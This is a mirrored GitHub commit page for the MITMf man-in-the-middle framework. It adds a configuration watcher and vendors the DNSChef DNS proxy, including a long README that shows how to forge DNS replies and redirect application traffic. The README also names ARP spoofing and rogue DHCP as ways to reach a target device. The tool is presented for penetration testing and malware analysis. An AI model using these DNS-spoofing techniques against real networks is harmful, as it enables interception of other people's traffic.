mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
initial dynamic config support
added configwatcher.py
This commit is contained in:
parent
96eb4e2fa6
commit
663f38e732
26 changed files with 1187 additions and 281 deletions
3
.gitmodules
vendored
3
.gitmodules
vendored
|
@ -7,6 +7,3 @@
|
|||
[submodule "core/beefapi"]
|
||||
path = core/beefapi
|
||||
url = https://github.com/byt3bl33d3r/beefapi
|
||||
[submodule "libs/dnschef"]
|
||||
path = libs/dnschef
|
||||
url = https://github.com/byt3bl33d3r/dnschef
|
||||
|
|
12
README.md
12
README.md
|
@ -13,6 +13,13 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
|
|||
============================
|
||||
As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
|
||||
|
||||
How to install on Kali
|
||||
======================
|
||||
|
||||
```apt-get install mitmf```
|
||||
|
||||
**Currently Kali has a very old version of MITMf in it's repos, please read the [Installation](#installation) section to get the latest version**
|
||||
|
||||
Installation
|
||||
============
|
||||
If MITMf is not in your distros repo or you just want the latest version:
|
||||
|
@ -79,8 +86,3 @@ If you find a *bug* please open an issue and include at least the following in t
|
|||
- OS your using
|
||||
|
||||
Also remember: Github markdown is your friend!
|
||||
|
||||
How to install on Kali
|
||||
======================
|
||||
|
||||
```apt-get install mitmf```
|
||||
|
|
|
@ -40,7 +40,7 @@
|
|||
nameservers = 8.8.8.8
|
||||
|
||||
[[[A]]] # Queries for IPv4 address records
|
||||
*.thesprawl.org=192.0.2.1
|
||||
*.thesprawls.org=192.0.2.1
|
||||
|
||||
[[[AAAA]]] # Queries for IPv6 address records
|
||||
*.thesprawl.org=2001:db8::1
|
||||
|
|
49
core/configwatcher.py
Normal file
49
core/configwatcher.py
Normal file
|
@ -0,0 +1,49 @@
|
|||
#! /usr/bin/env python2.7
|
||||
|
||||
import logging
|
||||
|
||||
logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
|
||||
from watchdog.observers import Observer
|
||||
from watchdog.events import FileSystemEventHandler
|
||||
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ConfigWatcher(FileSystemEventHandler):
|
||||
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
|
||||
self.config = ConfigObj("./config/mitmf.conf")
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if ConfigWatcher._instance is None:
|
||||
ConfigWatcher._instance = ConfigWatcher()
|
||||
|
||||
return ConfigWatcher._instance
|
||||
|
||||
def startConfigWatch(self):
|
||||
observer = Observer()
|
||||
observer.schedule(self, path='./config', recursive=False)
|
||||
observer.start()
|
||||
|
||||
def getConfig(self):
|
||||
return self.config
|
||||
|
||||
def on_modified(self, event):
|
||||
mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
|
||||
self.reloadConfig()
|
||||
self.onConfigChange()
|
||||
|
||||
def onConfigChange(self):
|
||||
""" We can subclass this function to do stuff after the config file has been modified"""
|
||||
pass
|
||||
|
||||
def reloadConfig(self):
|
||||
try:
|
||||
self.config = ConfigObj("./config/mitmf.conf")
|
||||
except Exception, e:
|
||||
mitmf_logger.warning("Error reloading config file: {}".format(e))
|
29
core/dnschef/CHANGELOG
Normal file
29
core/dnschef/CHANGELOG
Normal file
|
@ -0,0 +1,29 @@
|
|||
Version 0.3
|
||||
|
||||
* Added support for the latest version of the dnslib library - 0.9.3
|
||||
* Added support for logging. (idea by kafeine)
|
||||
* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix)
|
||||
* Added support for TCP remote nameserver connections. (idea by mubix)
|
||||
* DNS name matching is now case insensitive.
|
||||
* Various small bug fixes and performance tweaks.
|
||||
* Python libraries are no longer bundled with the distribution, but
|
||||
compiled in the Windows binary.
|
||||
|
||||
Version 0.2.1
|
||||
|
||||
* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi)
|
||||
|
||||
Version 0.2
|
||||
|
||||
* Added IPv6 support.
|
||||
* Added AAAA, MX, CNAME, NS, SOA and NAPTR support.
|
||||
* Added support for ANY queries (returns all known fake records).
|
||||
* Changed file format to support more DNS record types.
|
||||
* Added alternative DNS port support (contributed by fnv).
|
||||
* Added alternative listening port support for the server (contributed by Mark Straver).
|
||||
* Updated bundled dnslib library to the latest version - 0.8.2.
|
||||
* Included IPy library for IPv6 support.
|
||||
|
||||
Version 0.1
|
||||
|
||||
* First public release
|
25
core/dnschef/LICENSE
Normal file
25
core/dnschef/LICENSE
Normal file
|
@ -0,0 +1,25 @@
|
|||
Copyright (C) 2014 Peter Kacherginsky
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright notice, this
|
||||
list of conditions and the following disclaimer.
|
||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
this list of conditions and the following disclaimer in the documentation
|
||||
and/or other materials provided with the distribution.
|
||||
3. Neither the name of the copyright holder nor the names of its contributors
|
||||
may be used to endorse or promote products derived from this software without
|
||||
specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
|
||||
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
339
core/dnschef/README.md
Normal file
339
core/dnschef/README.md
Normal file
|
@ -0,0 +1,339 @@
|
|||
DNSChef
|
||||
=======
|
||||
|
||||
The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/
|
||||
|
||||
DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
|
||||
|
||||
There are several DNS Proxies out there. Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below.
|
||||
|
||||
The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.
|
||||
|
||||
Setting up a DNS Proxy
|
||||
======================
|
||||
|
||||
Before you can start using DNSChef, you must configure your machine to use a DNS nameserver with the tool running on it. You have several options based on the operating system you are going to use:
|
||||
|
||||
* **Linux** - Edit */etc/resolv.conf* to include a line on the very top with your traffic analysis host (e.g add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside the Network Manager open IPv4 Settings, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop down box and edit *DNS Servers* text box to include an IP address with DNSChef running.
|
||||
|
||||
* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select properties. From within a newly appearing dialog box, select *Internet Protocol (TCP/IP)* and click on properties. At last select *Use the following DNS server addresses* radio button and enter the IP address with DNSChef running. For example, if running locally enter 127.0.0.1.
|
||||
|
||||
* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using Airport then you will have to click on *Advanced...* button and edit DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g "nameserver 127.0.0.1").
|
||||
|
||||
* **iOS** - Open *Settings* and select *General*. Next select on *Wi-Fi* and click on a blue arrow to the right of an active Access Point from the list. Edit DNS entry to point to the host with DNSChef running. Make sure you have disabled Cellular interface (if available).
|
||||
|
||||
* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable *Use static IP* checkbox and configure a custom DNS server.
|
||||
|
||||
If you do not have the ability to modify device's DNS settings manually, then you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods.
|
||||
|
||||
At last you need to configure a fake service where DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services.
|
||||
|
||||
Running DNSChef
|
||||
===============
|
||||
|
||||
DNSChef is a cross-platform application developed in Python which should run on most platforms which have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide will concentrate on Unix environments; however, all of the examples below were tested to work on Windows as well.
|
||||
|
||||
Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53):
|
||||
|
||||
# ./dnschef.py
|
||||
|
||||
_ _ __
|
||||
| | version 0.2 | | / _|
|
||||
__| |_ __ ___ ___| |__ ___| |_
|
||||
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
|
||||
| (_| | | | \__ \ (__| | | | __/ |
|
||||
\__,_|_| |_|___/\___|_| |_|\___|_|
|
||||
iphelix@thesprawl.org
|
||||
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
|
||||
|
||||
Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned back to the quering host. For example, let's query an "A" record for a domain and observe results:
|
||||
|
||||
$ host -t A thesprawl.org
|
||||
thesprawl.org has address 108.59.3.64
|
||||
|
||||
DNSChef will print the following log line showing time, source IP address, type of record requested and most importantly which name was queried:
|
||||
|
||||
[23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
This mode is useful for simple application monitoring where you need to figure out which domains it uses for its communications.
|
||||
|
||||
DNSChef has full support for IPv6 which can be activated using *-6* or *--ipv6** flags. It works exactly as IPv4 mode with the exception that default listening interface is switched to ::1 and default DNS server is switched to 2001:4860:4860::8888. Here is a sample output:
|
||||
|
||||
# ./dnschef.py -6
|
||||
_ _ __
|
||||
| | version 0.2 | | / _|
|
||||
__| |_ __ ___ ___| |__ ___| |_
|
||||
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
|
||||
| (_| | | | \__ \ (__| | | | __/ |
|
||||
\__,_|_| |_|___/\___|_| |_|\___|_|
|
||||
iphelix@thesprawl.org
|
||||
|
||||
[*] Using IPv6 mode.
|
||||
[*] DNSChef started on interface: ::1
|
||||
[*] Using the following nameservers: 2001:4860:4860::8888
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:35:44] ::1: proxying the response of type 'A' for thesprawl.org
|
||||
[00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org
|
||||
[00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org
|
||||
|
||||
NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later.
|
||||
|
||||
Intercept all responses
|
||||
-----------------------
|
||||
|
||||
Now, that you know how to start DNSChef let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
[23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
|
||||
[23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
|
||||
|
||||
In the above output you an see that DNSChef was configured to proxy all requests to 127.0.0.1. The first line of log at 08:11:23 shows that we have "cooked" the "A" record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from requesting program:
|
||||
|
||||
$ host google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address 2001:4860:4001:803::1001
|
||||
google.com mail is handled by 10 aspmx.l.google.com.
|
||||
google.com mail is handled by 40 alt3.aspmx.l.google.com.
|
||||
google.com mail is handled by 30 alt2.aspmx.l.google.com.
|
||||
google.com mail is handled by 20 alt1.aspmx.l.google.com.
|
||||
google.com mail is handled by 50 alt4.aspmx.l.google.com.
|
||||
|
||||
As you can see the program was tricked to use 127.0.0.1 for the IPv4 address. However, the information obtained from IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will correctly obtain one through this proxied request.
|
||||
|
||||
Let's fake one more request to illustrate how to target multiple records at the same time:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[*] Cooking all AAAA replies to point to ::1
|
||||
[00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
[00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1
|
||||
[00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com
|
||||
|
||||
In addition to the --fakeip flag, I have now specified --fakeipv6 designed to fake 'AAAA' record queries. Here is an updated program output:
|
||||
|
||||
$ host google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address ::1
|
||||
google.com mail is handled by 10 aspmx.l.google.com.
|
||||
google.com mail is handled by 40 alt3.aspmx.l.google.com.
|
||||
google.com mail is handled by 30 alt2.aspmx.l.google.com.
|
||||
google.com mail is handled by 20 alt1.aspmx.l.google.com.
|
||||
google.com mail is handled by 50 alt4.aspmx.l.google.com.
|
||||
|
||||
Once more all of the records not explicitly overriden by the application were proxied and returned from the real DNS server. However, IPv4 (A) and IPv6 (AAAA) were both faked to point to a local machine.
|
||||
|
||||
DNSChef supports multiple record types:
|
||||
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
| Record | Description |Argument | Example |
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
| A | IPv4 address |--fakeip | --fakeip 192.0.2.1 |
|
||||
| AAAA | IPv6 address |--fakeipv6 | --fakeipv6 2001:db8::1 |
|
||||
| MX | Mail server |--fakemail | --fakemail mail.fake.com |
|
||||
| CNAME | CNAME record |--fakealias| --fakealias www.fake.com |
|
||||
| NS | Name server |--fakens | --fakens ns.fake.com |
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
|
||||
NOTE: For usability not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details.
|
||||
|
||||
At last let's observe how the application handles queries of type ANY:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[*] Cooking all AAAA replies to point to ::1
|
||||
[*] Cooking all MX replies to point to mail.fake.com
|
||||
[*] Cooking all CNAME replies to point to www.fake.com
|
||||
[*] Cooking all NS replies to point to ns.fake.com
|
||||
[00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records.
|
||||
|
||||
DNS ANY record queries results in DNSChef returning every faked record that it knows about for an applicable domain. Here is the output that the program will see:
|
||||
|
||||
$ host -t ANY google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address ::1
|
||||
google.com mail is handled by 10 mail.fake.com.
|
||||
google.com is an alias for www.fake.com.
|
||||
google.com name server ns.fake.com.
|
||||
|
||||
Filtering domains
|
||||
-----------------
|
||||
|
||||
Using the above example, consider you only want to intercept requests for *thesprawl.org* and leave queries to all other domains such as *webfaction.com* without modification. You can use the *--fakedomains* parameter as illustrated below:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org
|
||||
[00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1
|
||||
[00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
|
||||
|
||||
From the above example the request for *thesprawl.org* was faked; however, the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest.
|
||||
|
||||
NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not.
|
||||
|
||||
Reverse filtering
|
||||
-----------------
|
||||
|
||||
In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org
|
||||
[00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
|
||||
[00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
|
||||
There are several things going on in the above example. First notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
|
||||
|
||||
NOTE: Wildcards are position specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
|
||||
|
||||
External definitions file
|
||||
-------------------------
|
||||
|
||||
There may be situations where defining a single fake DNS record for all matching domains may not be sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want the request to go.
|
||||
|
||||
For example, let create the following definitions file and call it *dnschef.ini*:
|
||||
|
||||
[A]
|
||||
*.google.com=192.0.2.1
|
||||
thesprawl.org=192.0.2.2
|
||||
*.wordpress.*=192.0.2.3
|
||||
|
||||
Notice the section header [A], it defines the record type to DNSChef. Now let's carefully observe the output of multiple queries:
|
||||
|
||||
# ./dnschef.py --file dnschef.ini -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking A replies for domain *.google.com with '192.0.2.1'
|
||||
[+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
|
||||
[+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
|
||||
[00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
|
||||
[00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1
|
||||
[00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2
|
||||
[00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org
|
||||
[00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3
|
||||
[00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3
|
||||
[00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org
|
||||
|
||||
Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand *www.thesprawl.org* request was simply proxied instead of being modified. At last all variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. At last an undefined *slashdot.org* query was simply proxied with a real response.
|
||||
|
||||
You can specify section headers for all other supported DNS record types including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA]. For example, let's define a new [PTR] section in the 'dnschef.ini' file:
|
||||
|
||||
[PTR]
|
||||
*.2.0.192.in-addr.arpa=fake.com
|
||||
|
||||
Let's observe DNSChef's behavior with this new record type:
|
||||
|
||||
./dnschef.py --file dnschef.ini -q
|
||||
[sudo] password for iphelix:
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com'
|
||||
[00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com
|
||||
|
||||
And here is what a client might see when performing reverse DNS queries:
|
||||
|
||||
$ host 192.0.2.1 localhost
|
||||
1.2.0.192.in-addr.arpa domain name pointer fake.com.
|
||||
|
||||
Some records require exact formatting. Good examples are SOA and NAPTR
|
||||
|
||||
[SOA]
|
||||
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
|
||||
|
||||
[NAPTR]
|
||||
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
|
||||
|
||||
See sample dnschef.ini file for additional examples.
|
||||
|
||||
Advanced Filtering
|
||||
------------------
|
||||
|
||||
You can mix and match input from a file and command line. For example the following command uses both *--file* and *--fakedomains* parameters:
|
||||
|
||||
# ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking A replies for domain *.google.com with '192.0.2.1'
|
||||
[+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
|
||||
[+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
|
||||
[*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org
|
||||
[*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org
|
||||
[00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
|
||||
[00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6
|
||||
[00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6
|
||||
[00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com
|
||||
|
||||
Notice the definition for *thesprawl.org* in the command line parameter took precedence over *dnschef.ini*. This could be useful if you want to override values in the configuration file. slashdot.org still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. tor.com request is simply proxied since it was not specified in either command line or the configuration file.
|
||||
|
||||
Other configurations
|
||||
====================
|
||||
|
||||
For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter:
|
||||
|
||||
# ./dnschef.py --interface 0.0.0.0 -q
|
||||
[*] DNSChef started on interface: 0.0.0.0
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
or for IPv6:
|
||||
|
||||
# ./dnschef.py -6 --interface :: -q
|
||||
[*] Using IPv6 mode.
|
||||
[*] DNSChef started on interface: ::
|
||||
[*] Using the following nameservers: 2001:4860:4860::8888
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
By default, DNSChef uses Google's public DNS server to make proxy requests. However, you can define a custom list of nameservers using the *--nameservers* parameter:
|
||||
|
||||
# ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 4.2.2.1, 4.2.2.2
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
It is possible to specify non-standard nameserver port using IP#PORT notation:
|
||||
|
||||
# ./dnschef.py --nameservers 192.0.2.2#5353 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 192.0.2.2#5353
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter:
|
||||
|
||||
# ./dnschef.py -p 5353 -q
|
||||
[*] Listening on an alternative port 5353
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
|
||||
DNS protocol can be used over UDP (default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag.
|
||||
|
||||
Internal architecture
|
||||
=====================
|
||||
|
||||
Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP.
|
||||
|
||||
The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 addresses manipulation. Both libraries come bundled with DNSChef to ease installation.
|
||||
|
||||
DNSChef is capable of modifing queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA", "ANY". It is very easy to expand or modify behavior for any record. Simply add another **if qtype == "RECORD TYPE")** entry and tell it what to reply with.
|
||||
|
||||
Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org.
|
||||
|
||||
Happy hacking!
|
||||
-Peter
|
0
core/dnschef/__init__.py
Normal file
0
core/dnschef/__init__.py
Normal file
502
core/dnschef/dnschef.py
Executable file
502
core/dnschef/dnschef.py
Executable file
|
@ -0,0 +1,502 @@
|
|||
#!/usr/bin/env python2.7
|
||||
#
|
||||
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
|
||||
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
|
||||
# for the latest version and documentation. Please forward all issues and
|
||||
# concerns to iphelix [at] thesprawl.org.
|
||||
|
||||
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
|
||||
# All rights reserved.
|
||||
#
|
||||
# Redistribution and use in source and binary forms, with or without
|
||||
# modification, are permitted provided that the following conditions are met:
|
||||
#
|
||||
# 1. Redistributions of source code must retain the above copyright notice, this
|
||||
# list of conditions and the following disclaimer.
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
|
||||
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
import threading, random, operator, time
|
||||
import SocketServer, socket, sys, os
|
||||
import binascii
|
||||
import string
|
||||
import base64
|
||||
import time
|
||||
import logging
|
||||
|
||||
from configobj import ConfigObj
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
from dnslib import *
|
||||
from IPy import IP
|
||||
|
||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||
